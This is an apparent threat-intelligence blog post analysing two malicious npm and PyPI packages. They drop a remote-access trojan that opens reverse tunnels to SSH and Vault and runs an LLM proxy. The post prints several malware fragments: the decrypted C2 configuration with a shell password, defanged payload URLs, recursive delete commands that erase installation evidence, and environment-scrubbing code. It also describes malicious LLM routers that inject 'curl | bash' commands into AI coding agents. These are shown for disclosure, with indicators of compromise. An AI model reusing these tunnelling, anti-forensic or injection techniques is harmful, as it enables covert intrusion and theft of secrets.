惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
量子位
M
MIT News - Artificial intelligence
Y
Y Combinator Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Google DeepMind News
Google DeepMind News
Hugging Face - Blog
Hugging Face - Blog
博客园_首页
雷峰网
雷峰网
I
InfoQ
罗磊的独立博客
博客园 - 聂微东
酷 壳 – CoolShell
酷 壳 – CoolShell
大猫的无限游戏
大猫的无限游戏
D
Docker
H
Hackread – Cybersecurity News, Data Breaches, AI and More
腾讯CDC
博客园 - 三生石上(FineUI控件)
The GitHub Blog
The GitHub Blog
K
Kaspersky official blog
P
Privacy & Cybersecurity Law Blog
S
SegmentFault 最新的问题
T
Threat Research - Cisco Blogs
H
Help Net Security
小众软件
小众软件
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
C
CERT Recently Published Vulnerability Notes
WordPress大学
WordPress大学
T
Tenable Blog
T
The Blog of Author Tim Ferriss
C
Cisco Blogs
Simon Willison's Weblog
Simon Willison's Weblog
博客园 - Franky
A
Arctic Wolf
T
Threatpost
Scott Helme
Scott Helme
C
Cybersecurity and Infrastructure Security Agency CISA
D
Darknet – Hacking Tools, Hacker News & Cyber Security
T
The Exploit Database - CXSecurity.com
G
GRAHAM CLULEY
Security Latest
Security Latest
Spread Privacy
Spread Privacy
L
LINUX DO - 热门话题
V
Vulnerabilities – Threatpost
P
Privacy International News Feed
S
Schneier on Security
Latest news
Latest news
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
C
Cyber Attacks, Cyber Crime and Cyber Security
C
CXSECURITY Database RSS Feed - CXSecurity.com

Aikido Security's Blog

GlassWorm goes native: New Zig dropper infects every IDE on your machine Aikido Attack finds multiple 0-days in Hoppscotch The cybersecurity doomerism around Mythos doesn't match what we see on the ground axios compromised on npm: maintainer account hijacked, RAT deployed Popular telnyx package compromised on PyPI by TeamPCP Aikido × Lovable: Vibe, Fix, Ship CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran TeamPCP deploys CanisterWorm on NPM following Trivy compromise Security testing is validating software that no longer exists Aikido Recognized by Frost & Sullivan with the 2026 Customer Value Leadership Award in ASPM GlassWorm Hides a RAT Inside a Malicious Chrome Extension fast-draft Open VSX Extension Compromised by BlokTrooper Glassworm Strikes Popular React Native Phone Number Packages Glassworm Is Back: A New Wave of Invisible Unicode Attacks Hits Hundreds of Repositories How Security Teams Fight Back Against AI-Powered Hackers Introducing Betterleaks, an open source secrets scanner by the author of Gitleaks Trump’s 2026 cybersecurity strategy: From compliance to consequence How does AI pentesting work with compliance? What continuous pentesting actually requires Rare Not Random: Using Token Efficiency for Secrets Scanning Persistent XSS/RCE using WebSockets in Storybook’s dev server Why Determinism Is Still a Necessity in Security WAF vs. RASP vs. ADR Introducing Aikido Infinite: A new model of self-securing software How Aikido secures AI pentesting agents by design Astro Full-Read SSRF via Host Header Injection How to Get Your Board to Care About Security (Before a Breach Forces the Issue) What is Slopsquatting? The AI Package Hallucination Attack Already Happening SvelteSpill: A Cache Deception Bug in SvelteKit + Vercel Top 6 Wiz Code Alternatives Aikido recognized as Platform Leader in Latio Tech's 2026 Application Security Report From detection to prevention: How Zen stops IDOR vulnerabilities at runtime npm backdoor lets hackers hijack gambling outcomes Introducing Upgrade Impact Analysis: When breaking changes actually matter to your code Why Trying to Secure OpenClaw is Ridiculous Claude Opus 4.6 found 500 vulnerabilities. What does this change for software security? Introducing Aikido Expansion Packs: Safer defaults inside the IDE International AI Safety Report 2026: What It Means for Autonomous AI Systems Self-Securing Software: What It Is, Why It Matters, and How It Works npx Confusion: Packages That Forgot to Claim Their Own Name What Is Continuous Pentesting? Introducing Aikido Package Health: a Better Way to Trust Your Dependencies AI Pentesting: Minimum Safety Requirements for Security Testing Secure SDLC for Engineering Teams (+ Checklist) Fake Clawdbot VS Code Extension Installs ScreenConnect RAT G_Wagon: npm Package Deploys Python Stealer Targeting 100+ Crypto Wallets Gone Phishin': npm Packages Serving Custom Credential Harvesting Pages Malicious PyPI Packages spellcheckpy and spellcheckerpy Deliver Python RAT Top 10 AI Security Tools For 2026 Agent Skills Are Spreading Hallucinated npx Commands Understanding Open-Source License Risk in Modern Software The CISO Vibe Coding Checklist for Security Top 6 Graphite alternatives for AI code review in 2026 From “No Bullsh*t Security” to $1B: We Just Raised Our $60m Series B Critical n8n Vulnerability Allows Unauthenticated Remote Code Execution (CVE-2026-21858) Top 14 VS Code Extensions for 2026 AI-Driven Pentesting of Coolify: Seven CVEs Identified Top Continuous Pentesting Tools in 2026 SAST vs SCA: Securing the Code You Write and the Code You Depend On JavaScript, MSBuild, and the Blockchain: Anatomy of the NeoShadow npm Supply-Chain Attack How Engineering and Security Teams Can Meet DORA’s Technical Requirements IDOR Vulnerabilities Explained: Why They Persist in Modern Applications Shai Hulud strikes again - The golden path MongoBleed: MongoDB Zlib Vulnerability (CVE-2025-14847) and How to Fix It First Sophisticated Malware Discovered on Maven Central via Typosquatting Attack on Jackson The Fork Awakens: Why GitHub’s Invisible Networks Break Package Security Top 10 Cyber Security Tools For 2026 SAST in the IDE is now free: Moving SAST to where development actually happens AI Pentesting in Action: A TL;DV Recap of Our Live Demo The Top 7 Threat Intelligence Tools in 2026 React & Next.js DoS Vulnerability (CVE-2025-55184): What You Need to Fix After React2Shell OWASP Top 10 for Agentic Applications (2026): What Developers and Security Teams Need to Know DAST vs Pentesting v AI Pentesting: Why DAST Cannot Replace Modern Pentesting PromptPwnd: Prompt Injection Vulnerabilities in GitHub Actions Using AI Agents Top 7 Cloud Security Vulnerabilities Critical React & Next.js RCE Vulnerability (CVE-2025-55182): What You Need to Fix Now How to Comply With the UK Cybersecurity & Resilience Bill: A Practical Guide for Modern Engineering Teams Shai Hulud 2.0: What the Unknown Wonderer Tells Us About the Attackers’ Endgame SCA Everywhere: Scan and Fix Open-Source Dependencies in Your IDE Safe Chain now enforces a minimum package age before install Shai Hulud Attacks Persist Through GitHub Actions Vulnerabilities Shai Hulud Launches Second Supply-Chain Attack: Zapier, ENS, AsyncAPI, PostHog, Postman Compromised CORS Security: Beyond Basic Configuration Revolut Selects Aikido Security to Power Developer-First Software Security The Future of Pentesting Is Autonomous How Aikido and Deloitte are bringing developer-first security to enterprise Secrets Detection: A Practical Guide to Finding and Preventing Leaked Credentials Invisible Unicode Malware Strikes OpenVSX, Again AI as a Power Tool: How Windsurf and Devin Are Changing Secure Coding Building Fast, Staying Secure: Supabase’s Approach to Secure-by-Default Development OWASP Top 10 2025: Official List, Changes, and What Developers Need to Know Top 10 JavaScript Security Vulnerabilities in Modern Web Apps The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties Top 7 Black Duck Alternatives in 2026 What Is IaC Security Scanning? Terraform, Kubernetes & Cloud Misconfigurations Explained AutoTriage and the Swiss Cheese Model of Security Noise Reduction Top Software Supply Chain Security Vulnerabilities Explained The Top 7 Kubernetes Security Tools Top 10 Web Application Security Vulnerabilities Every Team Should Know What Is CSPM (and CNAPP)? Cloud Security Posture Management Explained
GPT-Proxy Backdoor in npm and PyPI turns Servers into Chinese LLM Relays
Ilyas Makari · 2026-04-22 · via Aikido Security's Blog

We recently observed two malicious packages across npm (kube-health-tools) and PyPI (kube-node-health) that appear designed to target Kubernetes environments. Both packages are innocuous on the surface, using names that reference Kubernetes to appear legitimate. But under the hood, they silently install a full LLM proxy service on the victim's machine, allowing the attacker to route LLM traffic through the compromised server as if it were just another relay node in a commercial AI reselling platform.

Stage 1: The Droppers

Both packages ship a compiled native binary as their payload carrier.

The two stage 1 files are:

  • __init___cpython-311-x86_64-linux-gnu.so  (PyPI package)
  • addon.node  (npm package)

Both are native binaries that execute on import or on require(). The .so is a Cython-compiled Python extension; the .node is a Node.js native addon. They both download a stage 2 binary from GitHub. The encoded URL in the PyPI dropper resolves to:

https://github[.]com/gibunxi4201/kube-node-diag/releases/download/v2[.]0/kube-diag-linux-amd64-packed

The npm dropper fetches a more capable variant from the same release:

https://github[.]com/gibunxi4201/kube-node-diag/releases/download/v2[.]0/kube-diag-full-linux-amd64-packed

Both binaries are written to /tmp/.kh, marked executable, and launched immediately.

Both droppers also embed XOR-encrypted configuration blobs that get piped directly into the stage 2 binary on launch. The stage 2 binary reads the config from stdin, decrypts it, and uses it as its runtime configuration:

{
  "server": "https://sync[.]geeker[.]indevs[.]in",
  "auth": "skywork:e5c2b988f369d9e51f30985eb8c1c5ae",
  "tunnels": [
    "R:4444:127.0.0.1:0",
    "R:4446:127.0.0.1:22",
    "R:4445:127.0.0.1:8200"
  ],
  "shell": {
    "enabled": true,
    "password": "123qweASD",
    "auth_keys": []
  },
  "disguise": {
    "process_name": "node-health-check",
    "argv": "--mode=daemon"
  },
  "keepalive": "25s",
  "max_retry_interval": "30s",
  "headers": {
    "User-Agent": "Mozilla/5.0"
  },
  "tls_skip_verify": true
}

The config reveals several things about the operation. The Command and Control (C2) server is sync[.]geeker[.]indevs[.]in, authenticated with a hardcoded credential (skywork:e5c2b988f369d9e51f30985eb8c1c5ae). The disguise block instructs the implant to masquerade its process as node-health-check --mode=daemon, blending in with legitimate tooling in a process listing.

The three reverse tunnels in the config each map a port on the attacker's C2 server to a local service on the victim machine:

  • Port 4444 routes to 127.0.0.1:0 (the LLM proxy)
  • Port 4446 routes to 127.0.0.1:22 (the victim's SSH server)
  • Port 4445 routes to 127.0.0.1:8200 (HashiCorp Vault's default port, a secrets store commonly used in Kubernetes environments)

The npm variant also includes a ngrok fallback, which cycles through a pool of ngrok accounts delivered by the C2, exposing the victim’s server through a public endpoint.

After launching the stage 2 binary, the dropper script actively erases evidence of its own execution. It deletes the downloaded binary from /tmp/.kh, removes a second temp file at /tmp/.ns, and then, most notably, recursively deletes the entire kube-health-tools package directory from node_modules:

sleep 2
rm -f $P $S
find / -type d -name "kube-health-tools" -path "*/node_modules/*" -exec rm -rf {} + 2>/dev/null

Within two seconds of the stage 2 binary starting, every artifact of installation is gone. A post-incident forensic scan of node_modules will find nothing.

Stage 2: Remote Access Trojan

The stage 2 binary is a compiled Go binary with several capabilities packed into a single executable. It connects back to sync[.]geeker[.]indevs[.]in over WebSocket, establishes an SSH session, and uses a Chisel tunneling protocol to register the tunnels defined in the config.

The implant implements Chisel tunneling over WebSocket:

  • SOCKS5 proxy: The binary can expose a full SOCKS5 proxy, allowing the attacker to route arbitrary TCP traffic through the victim's network.
  • Reverse shell: Configured with the password (123qweASD) found in the dropper's config block, providing a full interactive terminal.
  • SFTP server: Ships a full SFTP server, giving the attacker complete filesystem read/write access.
  • LLM proxy: An OpenAI-compatible API gateway that accepts requests and routes them upstream through attacker-provided routers.

The binary takes care to conceal itself after launch. It renames its process to node-health-check with the argument --mode=daemon, making it blend in with legitimate tooling in a process listing. It also scrubs all relevant environment variables immediately on startup:

func ClearEnv() {
    for _, name := range []string{"NHC_CFG", "KH_CFG", "NHC_KEY", "NHC_KEY_FILE"} {
        os.Unsetenv(name)
    }
    const aesKey = "s0m3R4nd0mK3y2026xYz"
    for _, kv := range os.Environ() {
        parts := strings.SplitN(kv, "=", 2)
        if len(parts) == 2 && strings.Contains(parts[1], aesKey) {
            os.Unsetenv(parts[0])
        }
    }
}

This ensures that if a KH_CFG or NHC_CFG operator-override variable was set, it disappears from the environment before any inspection can find it.

The implant includes a fully functional OpenAI-compatible LLM proxy embedded directly in the stage 2 binary. It seems to be an API gateway that accepts requests and routes them to upstream APIs, including Chinese LLM routers like shubiaobiao.

The proxy exposes four inbound routes, reachable via the tunnel:

  • GET /health → 200 OK
  • GET /v1/models → list all configured models
  • POST /v1/chat/completions → route to upstream
  • POST /v1/completions → route to upstream

When a request hits /v1/chat/completions, the proxy:

  1. Reads the model field from the request body
  2. Looks up the model name in a routing table delivered by the C2
  3. Selects an API key from either the key_normal or key_ultra pool, depending on the config’s key_type field
  4. Rewrites the request with the upstream host, path, and bearer auth token.
  5. Forwards the request and streams the response back

From the upstream path strings found in the binary, the routing table maps model names to paths like these:

https://<url_from_c2>/gpt-proxy/shubiaobiao/chat/completions
https://<url_from_c2>/gpt-proxy/cloudsway/chat/completions
https://<url_from_c2>/gpt-proxy/aliyun/chat/completions
https://<url_from_c2>/gpt-proxy/volengine/chat/completions
https://<url_from_c2>/gpt-proxy/aws/claude/chat/completions
https://<url_from_c2>/gpt-proxy/azure/chat/completions
https://<url_from_c2>/gpt-proxy/google/claude/chat/completions
https://<url_from_c2>/gpt-proxy/xmind/claude/chat/completions
https://<url_from_c2>/gpt-proxy/kuanbang/chat/completions
https://<url_from_c2>/gpt-proxy/deepseek/reasoner
https://<url_from_c2>/gpt-proxy/router/chat/completions

The /gpt-proxy/ path prefix, combined with vendor names like shubiaobiao, cloudsway, and volengine, points to intermediary aggregators rather than official provider APIs. Neither api.openai.com nor api.anthropic.com appear anywhere in the binary.

The binary contains 109 hardcoded model name strings used to build the /v1/models response. They span the major frontier providers, including models from Anthropic (claude-opus-4.6, claude-sonnet-4.6-thinking), OpenAI (gpt-5.4, gpt-5.3-codex), Google (gemini-3.1-pro-preview, gemini-2.5-flash), ByteDance VolcEngine (doubao-seed-1.8-pro-251215, doubao_2050_write_agent_v7), and Alibaba (qwen3-235b-a22b-instruct-2507).

The Chinese Proxy Ecosystem

Running proxy servers on compromised machines is a recurring behavior in the Chinese threat landscape, driven in part by restrictions imposed by the Great Firewall. Previously, AhnLab discovered attackers deploying tools like TinyProxy and Sing-box on vulnerable honeypot servers to run covert proxy services. Indeed, the GitHub account gibunxi4201, which hosts the stage 2 payload, appears to have other proxy-related projects in its release history, consistent with an operator primarily focused on proxy infrastructure.

These proxy tools are often deployed on vulnerable servers for free proxy IPs, but also on free services like HuggingFace, Databricks, and Streamlit to browse the web without restrictions from the Great Firewall. The pattern is always the same: find a cheap or compromised resource and turn it into a free proxy server.

Chinese developers often can't access AI models because of regional blocks. This has created a booming gray market for LLM API access. Chinese platforms like Xianyu, Goofish, and Taobao are filled with listings from sellers offering access to ChatGPT, Claude, and Gemini at a fraction of the official prices via router endpoints (like those found in this malware). There are even sellers offering courses on how to monetize by running your own LLM routers.

Malicious LLM Routers

Beyond providing cheap access to AI, LLM routers like the one deployed here sit on a trust boundary that is easily abused. Because every request passes through the router in plaintext, a malicious operator can, as documented by Hanzhi Liu et al.:

  • Inject malicious tool calls into responses of coding agents before they reach the client, introducing malicious pip install or curl | bash payloads mid-flight
  • Silently exfiltrate secrets from request and response bodies, including API keys, AWS credentials, GitHub tokens, Ethereum private keys, and system prompts

The researchers found that in a corpus of 428 commodity routers, 9 were actively injecting malicious code into returned tool calls, and 17 were found to touch researcher-owned AWS canary credentials after observing them in transit.

While we found no evidence of injection or exfiltration in this specific implant, any developer whose AI coding tools are routed through a compromised machine is effectively passing their entire context window through an adversary-controlled relay.

How Aikido Detects This

If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.

If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.

For broader coverage across your whole team, Aikido's Endpoint Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.

For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.

IOCs

Malicious Packages

  • PyPI: kube-node-health
  • npm: kube-health-tools

File Hashes

  • __init___cpython-311-x86_64-linux-gnu.so (PyPI stage 1)
    • SHA256: b3405b8456f4e82f192cdff6fdd5b290a58fafda01fbc08174105b922bd7b3cf
  • addon.node (npm stage 1)
    • SHA256: 5d58ce3119c37f2bd552f4d883a4f4896dfcb8fb04875f844f999497e4ca846d
  • kube-diag-linux-amd64-packed (stage 2 PyPI variant)
    • SHA256: fb3ae78d09c119ec335c3b99a95c97d9bb6f92fd2c7c9b0d3e875347e2f25bb2
  • kube-diag-full-linux-amd64-packed (stage 2 npm variant)
    • SHA256: 3a3d8f8636fa1db21871005a49ecd7fa59688fa763622fa737ce6b899558b300

Network Indicators

  • C2 server: sync[.]geeker[.]indevs[.]in
  • Stage 2 download: github[.]com/gibunxi4201/kube-node-diag

Process Indicators

  • Process name: node-health-check
  • Temp download paths: /tmp/.kh and /tmp/.ns